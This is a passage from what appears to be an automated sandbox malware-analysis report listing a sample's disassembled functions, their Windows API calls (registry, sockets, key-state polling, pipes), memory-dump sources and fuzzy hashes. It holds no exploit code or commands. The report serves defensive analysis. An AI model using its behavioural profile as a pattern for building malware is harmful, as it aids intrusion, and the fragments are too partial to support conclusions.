                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                    • Opcode ID: a8556f3883cb4fc7194c333459a21730ec64fdbf27f1872d492ecb7dd2c5b7aa
                                                                                                                                    • Instruction ID: f496b38d8da89f62d858e33474bc09a489585fdcc7f6630a00e1a6e7dcc6c727
                                                                                                                                    • Opcode Fuzzy Hash: a8556f3883cb4fc7194c333459a21730ec64fdbf27f1872d492ecb7dd2c5b7aa
                                                                                                                                    • Instruction Fuzzy Hash: 6B21F971660146AFEF208F65DC98EBB37ADEF653A4F908138FA10A3290D371CC619760
                                                                                                                                    Function 002C7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002C7377
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C73AA
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002C73BC
                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002C73F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: 7b051055d61009eea24beed4408316ce5178d1ab21f20709e8a92b2267ffcdcd
                                                                                                                                    • Instruction ID: 0cb43c5cd5f5c1bdcf50b87c150cd602ea31243272010a899b365a8988154091
                                                                                                                                    • Opcode Fuzzy Hash: 7b051055d61009eea24beed4408316ce5178d1ab21f20709e8a92b2267ffcdcd
                                                                                                                                    • Instruction Fuzzy Hash: B721A3705143469BDB208F64DC48F9A7BA4AF54760F204B6DFCA0D72D0D7709860DF60
                                                                                                                                    Function 002C7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002C7444
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C7476
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002C7487
                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002C74C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: 5e2ac268c0e46ac61c218a9f6fb66d5d526a966670f351473f6ca28bd8123a5a
                                                                                                                                    • Instruction ID: b70daaca3f33ca2071bde7c06156376bb806cdc85417b333984b470332242428
                                                                                                                                    • Opcode Fuzzy Hash: 5e2ac268c0e46ac61c218a9f6fb66d5d526a966670f351473f6ca28bd8123a5a
                                                                                                                                    • Instruction Fuzzy Hash: 50219C316182069BDB249F689848FAA7BB8AF55730F204B1DFDA0D72D0DA709860CF61
                                                                                                                                    Function 002CB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002CB297
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002CB2EB
                                                                                                                                    • __swprintf.LIBCMT ref: 002CB304
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,002F0980), ref: 002CB342
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                    • String ID: %lu
                                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                                    • Opcode ID: 82fb9c4604fc223dbf26c86a3a732958090c04b9ceec2bff436946131cf74f2b
                                                                                                                                    • Instruction ID: f398686623583567317da992699474e6b01bbbf6f52e2a78d525a6ab45800af4
                                                                                                                                    • Opcode Fuzzy Hash: 82fb9c4604fc223dbf26c86a3a732958090c04b9ceec2bff436946131cf74f2b
                                                                                                                                    • Instruction Fuzzy Hash: 30218634A10109AFCB10EF65CC85DAEB7B8EF89714F104069F909E7252DB71EA51CF61
                                                                                                                                    Function 002BAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                      • Part of subcall function 002BAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BAA6F
                                                                                                                                      • Part of subcall function 002BAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 002BAA82
                                                                                                                                      • Part of subcall function 002BAA52: GetCurrentThreadId.KERNEL32 ref: 002BAA89
                                                                                                                                      • Part of subcall function 002BAA52: AttachThreadInput.USER32(00000000), ref: 002BAA90
                                                                                                                                    • GetFocus.USER32 ref: 002BAC2A
                                                                                                                                      • Part of subcall function 002BAA9B: GetParent.USER32(?), ref: 002BAAA9
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002BAC73
                                                                                                                                    • EnumChildWindows.USER32(?,002BACEB), ref: 002BAC9B
                                                                                                                                    • __swprintf.LIBCMT ref: 002BACB5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                    • String ID: %s%d
                                                                                                                                    • API String ID: 1941087503-1110647743
                                                                                                                                    • Opcode ID: af3da4e59dc1af08f960da3c4e1e3d5cfaa7632f1e43f70e21e75d06243c4490
                                                                                                                                    • Instruction ID: 6cc8da847e8b647c06dfbc05d5be0f538edefb3c6cc9615e49ced2f37960b4d6
                                                                                                                                    • Opcode Fuzzy Hash: af3da4e59dc1af08f960da3c4e1e3d5cfaa7632f1e43f70e21e75d06243c4490
                                                                                                                                    • Instruction Fuzzy Hash: 72119075610205ABDF11BFA09D85FEA777CAF44750F004075FA08AA183DA705965DF72
                                                                                                                                    Function 002C22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002C2318
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                                    • Opcode ID: 6662f05fffc9878da459fec1321676ae90fa9e1c36a116c797a5ffa7783b248e
                                                                                                                                    • Instruction ID: 59173752be76adc8468dce0ea0a62a5bebc73b9fc959a14cfb26078f2a732a0e
                                                                                                                                    • Opcode Fuzzy Hash: 6662f05fffc9878da459fec1321676ae90fa9e1c36a116c797a5ffa7783b248e
                                                                                                                                    • Instruction Fuzzy Hash: A1117C38A20119DBCF00EF94D8909EEF3B4FF19344B1081A9D814A7292EB366D2ACF40
                                                                                                                                    Function 002DF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002DF2F0
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002DF320
                                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002DF453
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002DF4D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2364364464-0
                                                                                                                                    • Opcode ID: 4084f1506ad375100a50cea94c69238b81338a7f72ae01b970a36f41868a4d95
                                                                                                                                    • Instruction ID: 608540acf7233fc0f1268873c142a98680c4794a87ccdafe021c2054ec51eebb
                                                                                                                                    • Opcode Fuzzy Hash: 4084f1506ad375100a50cea94c69238b81338a7f72ae01b970a36f41868a4d95
                                                                                                                                    • Instruction Fuzzy Hash: 8481A3716203019FD720EF28D986F2AB7E5AF44710F14882DF99ADB392D7B0AC508F55
                                                                                                                                    Function 0028563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1559183368-0
                                                                                                                                    • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                                                                                    • Instruction ID: ff29dd76876e3f939f522b16fcd82a4df980187c76ae8374a9d94d079b242a97
                                                                                                                                    • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                                                                                                    • Instruction Fuzzy Hash: F551AA38A22B26DBDB24AF79C88066EB7A5AF40320F64C769F835961D0D7709D709F40
                                                                                                                                    Function 002E0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002E147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E040D,?,?), ref: 002E1491
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E075D
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E079C
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002E07E3
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 002E080F
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002E081C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3440857362-0
                                                                                                                                    • Opcode ID: 3b99b170b2cbb16b482ffd7313b5b26524ba70ee9369e37e8a4bfb79eb934d14
                                                                                                                                    • Instruction ID: 4ea9296379a91bed3c8b0212a2ee4936367f34c98f0a3dc1074a714a79794b9d
                                                                                                                                    • Opcode Fuzzy Hash: 3b99b170b2cbb16b482ffd7313b5b26524ba70ee9369e37e8a4bfb79eb934d14
                                                                                                                                    • Instruction Fuzzy Hash: 7A517B31228245AFD714EF68C881F6AB7E9BF84304F40892DF59987292DB70ED65CF52
                                                                                                                                    Function 002D6E32 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002D8475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002D84A0
                                                                                                                                    • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002D6E89
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D6EB2
                                                                                                                                    • #2.WSOCK32(00000000,?,00000010), ref: 002D6EEB
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D6EF8
                                                                                                                                    • #3.WSOCK32(00000000,00000000), ref: 002D6F0C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #111
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 568940515-0
                                                                                                                                    • Opcode ID: a87a91319e1251263f00c9e1b9779c7a4fcb4cb0d5f3ccc276afc9cd0a2c05af
                                                                                                                                    • Instruction ID: 33c588941303fb2317a5a6ea65ad3ed93617887b25fc111754f88653da7603c2
                                                                                                                                    • Opcode Fuzzy Hash: a87a91319e1251263f00c9e1b9779c7a4fcb4cb0d5f3ccc276afc9cd0a2c05af
                                                                                                                                    • Instruction Fuzzy Hash: E241E375A20210AFDB11BF64DC8AF7E73A89B45754F008558F946AB3C2CA709D508FA1
                                                                                                                                    Function 002CEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002CEC62
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002CEC8B
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002CECCA
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002CECEF
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002CECF7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                    • Opcode ID: c428498d5c25becf7c2698be4f7a139c4aebf86eb4778c1ee72bfb3e5ce5f03b
                                                                                                                                    • Instruction ID: 21d63a54898038c0f1824c2cf1636f18e6a4fef9b6c2b055441fb61e8b6eb241
                                                                                                                                    • Opcode Fuzzy Hash: c428498d5c25becf7c2698be4f7a139c4aebf86eb4778c1ee72bfb3e5ce5f03b
                                                                                                                                    • Instruction Fuzzy Hash: 6A510A35A10505EFCB01EF64C985EADBBF5EF09314B148099E849AB3A2CB31ED61DF61
                                                                                                                                    Function 002EA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f8274c3c284d670e0371ac5502f711a9abfed308206ffbbddf268c764f3ef721
                                                                                                                                    • Instruction ID: a5af91b9413a6bbe6256639bf3aeb21b2b356988813907244689a3af44148cb9
                                                                                                                                    • Opcode Fuzzy Hash: f8274c3c284d670e0371ac5502f711a9abfed308206ffbbddf268c764f3ef721
                                                                                                                                    • Instruction Fuzzy Hash: F4411475960185AFDB10CF29CC88FBEFBB8EB09360F940165F816A32D2C670BD61DA51
                                                                                                                                    Function 00262714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00262727
                                                                                                                                    • ScreenToClient.USER32(003277B0,?), ref: 00262744
                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00262769
                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00262777
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                    • Opcode ID: 047f6ad2553195f8275cca5940218cee066b3fb3d7f55f12a65a1afe0d2421d5
                                                                                                                                    • Instruction ID: c64090e80bbcd9ecbba5d3eb3d17e7b4d80a9906a3fd0bb20cd322ec905f03e9
                                                                                                                                    • Opcode Fuzzy Hash: 047f6ad2553195f8275cca5940218cee066b3fb3d7f55f12a65a1afe0d2421d5
                                                                                                                                    • Instruction Fuzzy Hash: C941617552451AFBDF159F68C848EE9FB74FB05364F208355F82892290C730ADA4DF91
                                                                                                                                    Function 002652B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002652E6
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0026534A
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00265356
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00265360
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1795658109-0
